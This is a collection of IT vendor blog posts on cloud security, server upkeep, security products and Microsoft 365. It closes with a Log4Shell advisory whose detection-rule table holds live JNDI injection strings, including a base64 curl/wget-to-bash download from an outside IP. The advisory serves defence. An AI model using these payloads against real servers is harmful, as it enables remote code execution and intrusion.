Category: News and Events

Because of the cost-savings, improved collaboration, scalability, and business continuity, plenty of organizations are migrating their workloads to the cloud. But traditional security might not work in the cloud, so you might need to look for other solutions when it comes to cybersecurity. As a user, you’re responsible for configuring the cloud and securing your data and applications. To prevent misconfigurations, you’ll need to know what cloud security posture management is. Keep on reading to learn more!

Challenges Of Cloud Security

Data breaches occur because of cloud misconfigurations. Attackers can take advantage of these vulnerabilities to perform a breach — which could lead to huge financial losses or expose your company and customers’ data. Some examples of misconfigurations are providing open access to unencrypted storage buckets or having improperly configured virtualized network functions.

But how do misconfigurations happen? It often occurs when there is mismanagement of multiple connected resources, such as containers, serverless functions, etc. By not understanding which resources are interacting, you might end up applying for permissions without understanding the least privileged permissions required.

With constantly growing and evolving resources and cloud environments that are becoming large and complex, it might become more difficult for your internal IT team to manage these environments properly. These misconfigurations can go for a long time undetected.

What Is Cloud Security Posture Management

Cloud security posture management (CSPM) involves continuously improving and adapting cloud security to reduce the chances of successful attacks. It provides continuous visibility to cloud environments, so you can identify misconfigurations.

To differentiate with other cloud security tools, CSPM tools can compare the environment to a defined set of best practices and known security risks. Through this, it can provide your team with alerts if there is a threat that needs to be remediated.

CSPM tools can prevent, detect and respond to risks — helping you continuously monitor risk in the cloud. With this, you can automate cloud security management across IaaS, SaaS, and PaaS. Automation provides you with a way to quickly handle security risks, therefore protecting all your cloud assets more effectively.

Why Do You Need Cloud Security Posture Management?

Protecting a cloud infrastructure from threats and cybercriminals should be one of your priorities. But doing this is not simple, especially if you use a mixture of public, private, hybrid, and multi-cloud architectures.

Old traditional security practices won’t easily apply to the cloud because there is no defined perimeter to protect, which makes access management more challenging for your team. In addition to that, the lack of centralization in the cloud can make visibility more difficult.

But CSPM can provide you with visibility to the cloud, so you can detect misconfigurations and threats quickly. It’s a must-have nowadays when more and more organizations are leaning towards cloud applications and storage.

How Cloud Security Posture Management Works

To understand how CSPM protects you, you need to know how it works.

Visibility

First, it provides you with the visibility you need into the cloud. It can provide centralized and real-time visibility, so you can monitor existing resources and continuously discover new resources. This way, you can evaluate and display security posture in one place, which helps you discover the misconfigurations, changes in policies, and more.

Management Of Misconfigurations

Second, it can help you manage and remediate security issues, such as misconfigurations and unauthorized changes, thereby reducing human error that can cause data breaches. CSPM solutions can recommend solutions to fix a misconfiguration or automatically remedy the problem.

Threat Detection

Many organizations use multiple cloud security tools to discover and protect against threats. This can lead to alert fatigue and inefficient security. Other than that, most cloud security programs focus on intentional risks — such as outside attacks and malicious insiders. But unintentional errors can also leave your important data at risk of exposure.

CSPM is effective in monitoring your cloud environments and discovering new and potential threats. With this solution, you have access to continuous threat detection. It focuses on the areas that are most likely to be targeted, therefore reducing alert fatigue and prioritizing vulnerabilities. By providing visibility to the cloud, it can also prevent unintentional mistakes.

Key Takeaway

To summarize, CSPM can help your organization in detecting misconfigurations and vulnerabilities that can lead to security risks in the cloud. This is critical as misconfigurations can open your organization to cyberattacks. Other than that, it also gives you the tools you need to handle these issues.

If you need more information on what cloud security posture management is, you can send us a message here at CT Link! As an information technology solutions provider, we can help you find the right security solution that we tailor to your organization’s needs.

What are some tips to maintain your business server?

1. Keep an eye on server limits
2. Ensure that backups are working
3. Check for updates
4. Upgrade your server security
5. Consider using cloud solutions
6. Clean the hardware regularly

A server provides the data and services to the computers in your network, which are vital for your business. Servers are essential for storing files, deploying software, providing fast access to data, and more. Even though they can run 24/7 without problems, you still need to perform proper maintenance to ensure efficiency. This article will discuss some useful tips on how to maintain a business server. Read on to learn more.

Keep An Eye On Server Limits

To operate at peak condition, it’s recommended to monitor your server’s usage. It’s a good idea to delete old software, logs, and emails that you don’t need for your business. By doing this, you can perform faster recovery when the need arises.

Don’t wait until the disk capacity reaches 100% as this can lead to issues — such as data loss, computer crashes, and more. If this happens frequently, consider upgrading for added storage. Other than storage, make sure to review the CPU, RAM, and network utilization of your server.

Ensure That Backups Are Working

Without regular backups, you’re putting your business data at risk for permanent loss. Accidental deletion, natural disasters, and cyber threats can lead to the loss of data. When this happens, you might find it difficult to continue operations. Downtime can hurt your brand’s reputation, damage customer loyalty, and decrease your sales. For the above mentioned reasons, you need to regularly check that your backups are working as expected.

If you don’t have the manpower and resources to maintain and operate a backup system, you might still experience a loss of data. In this case, you can opt for a backup managed service. Through this, you can ensure that your backup solution is running smoothly and on schedule.

Check For Updates

Using an out-of-date operating system (OS) can leave your important corporate data at risk. While it might seem the obvious thing to do, plenty of organizations are still using old versions of their OS, which leaves them vulnerable to attacks. Cybercriminals will take advantage of known software vulnerabilities to perform a data breach.

By updating your OS regularly, you can ensure that it supports patch releases. Patches are essential because they can improve your OS’s stability and fix a security vulnerability. Overall, updates can make the user experience better while reducing security risks. Other than your OS, take time to check for application updates too.

Upgrade Your Server Security

Other than failed backups, critical business data can also get lost when you encounter cyberattacks and malware. For this reason, you need to implement the right security software and train your team about network security.

If you’re operating your business in a hybrid cloud environment, you will benefit from Trend Micro Deep Security. It offers unified security for physical, virtual, cloud, and container environments, so you don’t have to deploy multiple-point solutions. Through this, you can protect your critical servers and applications, detect and block threats in real-time, and automate security tasks.

Consider Using Cloud Solutions

Your server doesn’t have to do everything. If you want to optimize your workload resources, you can make better use of the cloud. For example, you can keep simpler workloads on-premise and process complex ones on the cloud — where you can easily upgrade features and capacities.

By opting for a hybrid cloud solution, you can meet high service and application demands with ease. When the computing demand increases in your on-premise servers, you can use the cloud to scale capacity up.

Clean The Hardware Regularly

The first and often forgotten task is to keep the servers clean. Over time, dust and other debris will accumulate on the hardware. If neglected, this can lead to an increase in temperature, which can cause issues — such as hardware problems or a potential fire in your building.

To clean your server, you can use compressed air to blow out the contaminants. Remember to avoid touching the components in the server when doing this. It’s also important to control the internal room temperature to prevent overheating. Monitor the humidity as low levels can cause electrostatic discharge while high levels can lead to rust, corrosion, mold, and short-circuiting.

Key Takeaway

Server maintenance is vital to keep your data safe and ensure uptime for your business. If you’re looking for more tips to maintain your business server, you can send us a message here at CT Link! We can point you to the right solutions to secure your data.

If you’re having difficulty ensuring that your backups are running smoothly, we can also offer backup-as-a-service. We will work closely with your organization to determine the data and applications you need to protect, advise you on the best practices, establish a strategy for recovery, monitor your backups, resolve problems, and more. This way, you can prevent permanent data loss and lessen downtime through fast recoveries.

VMware Carbon Black offers solutions that can make your security team’s workflow more efficient and provide endpoint protection that adapts to your needs. Other than that, you will also benefit from application control and extended detection and response. Keep on reading to know the benefits of VMware Carbon Black solutions for your business.

VMware provides software solutions such as app modernization, cloud, networking and security, and digital workspace. An organization that was founded in 1998, they have helped a wide range of industries such as banking, healthcare, government, retail, telecommunications, manufacturing, and transportation through technological innovations. They’re part of Forbes’ The Just 100 2021, ranking number 57 on the list of companies leading the new era of responsible capitalism.

In this article, you will learn about VMware Carbon Black Cloud Endpoint, Cloud Workload, App Control, and EDR.

VMware Carbon Black Cloud Endpoint

VMware Carbon Black Cloud Endpoint is a next-generation antivirus (NGAV) and behavioral end detection and response (EDR) solution. It’s capable of protecting your company from advanced cyberattacks. Through the easy-to-manage cloud-native endpoint protection platform, you can access the combined features of prevention and automated detection.

To do this, this next-generation antivirus can provide multiple protection layers to analyze endpoint activity and stop malicious behaviors. This is done through file reputation, heuristics, machine learning, and behavioral models. You can also tailor the behavioral prevention policies depending on your company’s needs.

With the VMware Carbon Black Endpoint solution, you can save money and time in trying to get to the bottom of an incident and responding to attacks. It can provide prioritized alerts, visibility to the entire attack chain, and endpoint activity analysis. You can also stay informed on the latest attacks and updates through the VMware Threat Analysis Unit.

VMware Carbon Black Cloud Workload

The VMware Carbon Black Cloud Workload is an advanced workload protection solution for modern data centers. It’s necessary nowadays when companies are moving towards cloud transformation and application modernization.

With this solution from VMware, you can reduce the attack surface of your workloads and strengthen your security posture. It’s suitable for modern workloads operating on virtualized, private, and hybrid cloud environments.

VMware Carbon Black Cloud Workload can help your security team automatically secure workloads and simplify operations. With this software, they can monitor high-risk vulnerabilities across environments. By running ongoing assessments, they are able to track IT hygiene over time.

With increased visibility, analyzing attacker behavior and pattern, as well as stopping new attacks has been made easier. Your team can also detect attacks that get through the perimeter defenses and address them quickly before it escalates into a data breach. With advanced workload protection, you can simplify operations and reduce having multiple security tools.

VMware Carbon Black App Control

VMware Carbon Black App Control can provide three benefits to your organization — extreme protection, continuous compliance, and high performance. It is the perfect solution if you have data centers or critical systems that can be targeted because of valuable data.

This solution utilizes a ‘default deny’ approach, which simply means that everything is denied until you specifically allow them. By doing this, the VMware Carbon Black App Control can reduce the attack surface to your data centers and critical systems.

Through the process of locking down critical systems and servers, you can prevent unwanted changes to your applications and files. This helps you stop malware and non-malware attacks.

Aside from these features, VMware Carbon Black App Control also has security features to detect behavioral indicators of malicious activity. It also has application control, file integrity monitoring, full-featured device control, and memory protection.

VMware Carbon Black EDR

VMware Carbon Black EDR (endpoint detection and response) is a must-have solution for on-premises threat hunting and incident response. This can make it easier for your security and IT team to have more visibility of suspicious activities and investigate incidents.

This VMware solution provides continuous visibility by recording and storing endpoint activity data to help your security team hunt threats in real-time. This is also beneficial when investigating incidents. Identifying root causes is quicker because of the provided intuitive attack chain visualization.

When threats are detected, your security team can perform a rapid response to contain them, repair any problems, and continue uptime for your business. Through the Live Response feature, they can also perform remote investigations, remediate threats, and contain ongoing incidents.

Key Takeaway

Your files and applications are important for your business. But attacks can happen anytime, which can affect your operations, leak your business data, and more. That’s why it’s essential to be proactive in protecting your critical systems and data by choosing VMware’s Carbon Black solutions. These make it easier for your security team to detect threats and respond to them as soon as possible.

If you’re interested in the benefits of VMware Carbon Black solutions for your business, you can contact us here at CT Link!

What do you need to know about cybersecurity awareness in the Philippines?

1. Recent cyberattack statistics
2. Biggest threats to cybersecurity
3. Campaigns for cybersecurity awareness
4. Approaches to improve cybersecurity posture

The information and communications technology in the country has changed over the years. With more and more people and businesses depending on these technologies, cybersecurity awareness in the Philippines has become more important than ever. There are many potential threats that could put your corporate data at risk — which could lead to downtime, loss of reputation, financial problems, and more. Read on to learn more about the recent developments in the field.

Recent Cyberattack Statistics

In recent years, there was an increase in small and medium-sized businesses (SMBs) that went digital to continue operations during the pandemic. Technology has become vital for businesses to survive. Because more and more organizations are becoming more digital, criminals are also on the hunt for victims.

In a study entitled “Cybersecurity for SMBs: Asia-Pacific (APAC) Businesses Prepare for Digital Defense” by Cisco Systems, Inc., 3,700 businesses from the Asia-Pacific region joined as participants — with more than a hundred organizations that came from the Philippines. The study observed that more than half of SMBs in the country fell victim to a cyberattack in the past year. And the effects were devastating — with companies losing over 25 million pesos and more.

But becoming proactive when it comes to cybersecurity can help curb this problem. In the same study, more than ¾ of the SMBs in the Philippines said that they have undergone cybersecurity scenario planning and simulations. Most of these companies have discovered weak points in their digital security.

Biggest Threats To Cybersecurity

According to the same study by Cisco, there are top two cybersecurity incidents that affected small to medium-sized businesses in the Philippines during the past year. The first one is malware attacks and the second is phishing.

Cyberattacks have led to the loss of customer data, employee data, business and financial information, emails, intellectual property, and reputation. Downtime is also another effect of cyberattacks.

Another 2021 report from Trend Micro revealed that among Southeast Asian countries, the Philippines ranked fourth when it comes to the Business Email Compromise (BEC) threats encountered, with Singapore topping the list. Ransomware is still one of the leading threats to look out for, especially in healthcare, food and beverage, and banking industries — which are most affected.

According to the Philippines National Computer Emergency Response Team (National CERT PH), which is a division under the Department of Information and Communications Technology’s (DICT) Cybersecurity Bureau, they have handled 755 incidents from the start of the year to the end of September 2021. The leading problem was malware and malicious files, followed by unauthorized scanning and brute-force attacks.

Campaigns For Cybersecurity Awareness

With many cybersecurity threats ever-present in the country, various organizations are having their own campaigns to boost awareness. One of these is Cybersecurity Awareness Month, which is observed every October. In 2021, the US Embassy in the Philippines held webinars about cybersecurity and business continuity.

In November 2021, National CERT PH also conducted the two-day National Cyber Drill 2021, which had the goal of involving the public, especially the banking, BPO, financial, and telecommunications sectors, when it comes to cybersecurity awareness.

Approaches To Improve Cybersecurity Posture

On the 8th of December 2021, Cisco released their study entitled Security Outcomes Study Volume 2, which is based on a worldwide survey with more than 5,000 security and privacy professionals as participants. The respondents included professionals from different companies in the Philippines.

In the study, it was observed that more than 30 percent of cybersecurity solutions used by Philippine organizations are considered outdated by the security and privacy professionals that work for them.

On the other hand, the good news is that more and more companies in the country are deciding to invest in modern cybersecurity technologies. Nine out of 10 respondents in the Philippines shared that their organization is investing in ‘Zero Trust’ strategy. More than 80 percent said that they’re investing in Secure Access Service Edge (SASE) architecture.

Zero Trust is a concept that involves verifying the identity of all users and devices before granting access to the network. Meanwhile SASE architecture combines security and network functions in a cloud platform to provide secure access to business applications. Together, these two solutions are helpful when it comes to building a strong security posture in today’s cloud-first landscape.

Key Takeaway

Cybersecurity awareness in the Philippines is essential because of the threats that are ever-present due to the increasing digitalization of organizations. Without any idea about the weaknesses of your online defenses, you’re at risk of being targeted by cybercriminals — no matter how small or big your company is. Attacks could lead to more problems such as loss of important data, finances, and reputation.

If you need help in improving your cybersecurity defenses, you can send us a message here at CT Link! We can help you implement the Zero-Trust strategy and the SASE architecture, so you can protect your business.

What do you need to consider when choosing between Microsoft 365 business basic vs standard?

1. Applications and services included
2. Teamwork and communication
3. Email and calendaring
4. File storage and sharing
5. Security and compliance
6. Support and deployment
7. Tools to build and manage your business

Microsoft 365 is a subscription plan that allows your business to access Office apps, online storage, and other productivity and collaboration tools. The advantage of a subscription is that you’ll always have the latest features, fixes, security updates, and ongoing tech support. Additionally, you can also settle your payment on a monthly or yearly basis. Best of all, you can decide from the various subscription plans available. In this article, you will learn about two of them — the Microsoft 365 Business Basic and Standard. Keep on reading!

Applications And Services Included

Microsoft 365 includes the Office desktop apps that you might be already familiar with. But along with that, you also get applications and services that can improve your teams’ collaboration and productivity in the workplace.

Here is a comparison of the applications and services that you can access with the Business Basic and Business Standard plan:

Business Basic Plan	Business Standard Plan
Word* Excel* PowerPoint* Outlook* Teams Exchange OneDrive SharePoint *These applications are only available in web versions.	Word* Excel* PowerPoint* Outlook* Teams Exchange OneDrive SharePoint Access (PC only) Publisher (PC only) *These applications are available in both web and desktop versions for Windows and Mac.

Teamwork And Communication

Microsoft 365 for business can greatly improve the teamwork and communication of your workforce. Both basic and standard subscription plans allow you to host online meetings and video calls for up to 300 people, chat with your team, connect and collaborate in one place, and create team sites to share information and content.

The main difference is that the Business Standard plan has a feature that lets you host webinars with attendee registration pages and email confirmations. While in an ordinary meeting, the focus is on discussion and sharing, webinars are more controlled. You’ll have presenters that share their ideas and an audience or attendees.

Email And Calendaring

Both the Microsoft 365 Business Basic and Standard offer the same features when it comes to email and calendaring. This includes email hosting with a 50 GB mailbox, permission to use custom domain names, and access to business-class email with the Exchange app. Both plans allow you to manage your calendar, schedule meetings, share available meeting times, and more.

With Exchange, you have a focused inbox that allows you to prioritize messages, so you can do your work smarter and more efficiently. You also have the option of customization with add-ins. This is available for phones, tablets, desktops, and the web.

File Storage And Sharing

Are you having trouble working on files across multiple devices? The good news is, both the Microsoft 365 business basic and standard come with useful features for file storage and sharing. For starters, you get 1 TB of OneDrive storage. When you save a file to OneDrive, you can access it on your synced devices. You can add more storage as you need or cancel it in the future.

Sharing files with other people is also made more secure because only those with permission can access them. You can choose to share files with external contacts through guest links.

Security And Compliance

Speaking of security, both subscription plans can provide protection to your email with Exchange Online Protection. This is a cloud-based filtering service that will help shield your business against spam, malware, and email threats.

First, the reputation of the sender of an email is inspected to reduce spam. Then the email is scanned for malware and sent to quarantine if one is detected. After that, the message will go through your set mail flow rules. Lastly, it goes through content filtering to detect signs of spam, phishing, and spoofing. Microsoft 365 Business Basic and Standard comply with international and industry-specific security and privacy standards.

Support And Deployment

One of the advantages of subscribing to Microsoft 365 for business is the access to continuous support. With both subscription plans, you get around-the-clock phone and online support. On top of this, you don’t have to worry about downtime because Microsoft can provide a 99.9% financially backed uptime guarantee.

When it comes to deployment, both subscription plans allow you to have a maximum of 300 users, which is suitable if you have a small business. For additional users, you may subscribe to Enterprise plans.

Tools To Build And Manage Your Business

With Microsoft 365 Business Basic and Standard, you can plan schedules and daily tasks to better align your team. Use the Microsoft Lists to organize work. To know what your employees and customers are thinking about, you can also use Microsoft Forms to gather feedback which can help your business.

One advantage of subscribing to the Microsoft 365 Business Standard is that you can also use Microsoft Bookings, which makes it more convenient for your clients to schedule appointments.

Key Takeaway

Microsoft 365 can provide you with apps and services that can increase your team’s productivity and improve collaboration. By considering the similarities and differences, you can pick between Microsoft 365 Business Basic and standard.

If you’re looking for IT solutions for your business, you can contact us here at CT Link. We can help you choose the products and services that will fit your organization’s needs.

What are some information security best practices?

1. Look for secure file sharing solutions
2. Back up business data
3. Be careful when opening emails
4. Secure your passwords

In 2019, 88% of organizations experienced spear-phishing attempts worldwide. Since the pandemic started, there have been reports from the US FBI about the 300% increase in cybercrime. With threats and risks present online, all organizations must step up their game when it comes to information security. It’s easy to say that it won’t happen to your business, but the stakes are high when dealing with and managing critical data. That’s why it’s vital to know about the information security best practices and how you can implement them. Read on.

Look For Secure File Sharing Solutions

As a business, you store all sorts of data for your operations. Without a formal file-sharing platform for your business, your employees might opt for free services made for consumer use, which might not be suitable for your business data. This might put your data at risk of exposure to outsiders and attackers.

Your files are only safe when you use secure tools to share them in your organization. These secure platforms allow you and your employees to protect sensitive files from intruders and unauthorized users.

If you’re interested, you can consider Azure files, a secure file share solution that allows you to synchronize data on-premise and the Azure server. This offers your organization a centralized location for all your files.

The platform is provided by Microsoft, which invests more than 1 billion USD yearly in cybersecurity research and development. Aside from that, Azure also has more certifications compared to other cloud providers. With more than 3,500 data and privacy security experts employed, you know that your data is safe.

Backup Business Data

Human error, cyber threats, natural disasters, hardware failure, and lost devices — these are just some reasons why you might accidentally lose your organization’s data.

Without a backup and disaster recovery plan, you won’t have any way of getting the files you need for your day-to-day operation. This can lead to unplanned downtime, loss of sales, and more.

But with a data backup solution like Unitrends, you can keep your corporate files safe on the cloud. It provides continuous file and folder backup, so you can restore files after accidentally deleting them. You can also rapidly recover data whenever you encounter a calamity or a power outage and pick up where you left off.

For your on-premise data center, you can back up your data by having a high availability clustering solution to protect against hardware, disk, or power failure. This means that you’ll have two servers, so in case the active one fails, the clone or passive ones will take over. This is effective at minimizing downtimes that may affect productivity in your business.

Be Careful When Opening Emails

More than half of global respondents in the State of Phish Annual Report of 2020 by Proofpoint said that their organization fell victim to at least one phishing attack in 2019. This has led to the loss of data, compromised accounts, ransomware infection, malware infection, financial loss, and more.

Phishing is one of the social engineering attacks that can occur through email exchanges. Someone might be impersonating a legitimate individual or institution to get sensitive information or to dupe someone into clicking on suspicious links. These links can install malware on the device they’re downloaded to.

Aside from investing in employee cybersecurity training, one way to prevent phishing attacks is to use Trend Micro Email Security. It’s a threat protection solution made for screening out malicious senders and filtering out phishing.

Secure Your Passwords

When it comes to protecting sensitive data and applications, passwords are beneficial. But having too many passwords to manage can be difficult. This can lead to shortcuts such as reusing the same passwords, making them too easy to remember, and the like. This can make it easier for criminals to guess your credentials.

For organizations that deal with sensitive data, multi-factor authentication is a must-have. This is a method of authenticating a user multiple times to prove their identity. Aside from username and passwords, this might also include a One-Time Pin (OTP) sent to another device, fingerprint scanning, and more.

Another option is to go passwordless. Instead of inputting your passwords, you can use a smartphone to provide your fingerprint, face, or PIN when logging in to your account. It’s a convenient and easy way of accessing sensitive information without having to remember too many passwords.

Key Takeaway

As a business, you need to know how to protect your business information and data. With plenty of threats and cybercriminals ever-present, you have to be proactive when it comes to data security. This way, you can avoid downtime, financial losses, malware infection, and more.

If you’re interested to learn more about information security best practices, you can contact us here at CT Link! We can provide you with specific solutions and services that will fit your organization’s security requirements. Some of these include on-premise file server and Azure file sync, email security, backup as a service, and more.

The past couple of days have been abuzz with news of a new critical vulnerability in Apache log4j.  It has been aptly named “Log4Shell” and has already been published as CVE-2021-44228. This vulnerability is so severe that many security vendors are rating it as a 10 in severity levels.

What is it and why is it so severe?

Log4Shell is an exploit found in the popular Java logging library log4j that threat actors could easily execute to gain full server access to the unfortunate target. Services such as Steam, Apple iCloud, and even Minecraft have already been found to be vulnerable to the exploit. Businesses using Apache Struts are likely to be vulnerable.

What can I do to Mitigate this Vulnerability?

The best solution to this exploit is to immediately update your log4j to the latest patch (2.15.0). However, if you cannot immediately update then you must immediately talk with your security providers on their steps for temporary mitigation.

For our Trend Micro Customers, you may use the following rules for Trend Micro Cloud one:

Trend Micro Cloud One™ – Workload Security and Deep Security IPS, LI Rules

IPS Rule: 1011242 – Log4j Remote Code Execution Vulnerability (CVE-2021-44228)

IPS Rule: 1005177 – Restrict Java Bytecode File (Jar/Class) Download

LI Rule: 1011241 – Apache Log4j Remote Code Execution Vulnerability (CVE-2021-44228)

Add custom LI rule to detect patterns as discovered in the future

Please follow the steps as mentioned on the following page and add the following sample patterns in the pattern matching field. You can add more patterns as you discover them over time.

S No.	Patterns for LI detection
1	${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8yMDQuMjA5LjE3Ni4yNDM6ODA4MHx8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC8yMDQuMjA5LjE3Ni4yNDM6ODA4MCl8YmFzaA==}
2	${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}
3	${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}

To learn more in detail about the Log4Shell Vulnerability, you may refer to the LunaSec guide or if you need further details on the Trend Micro Guide here.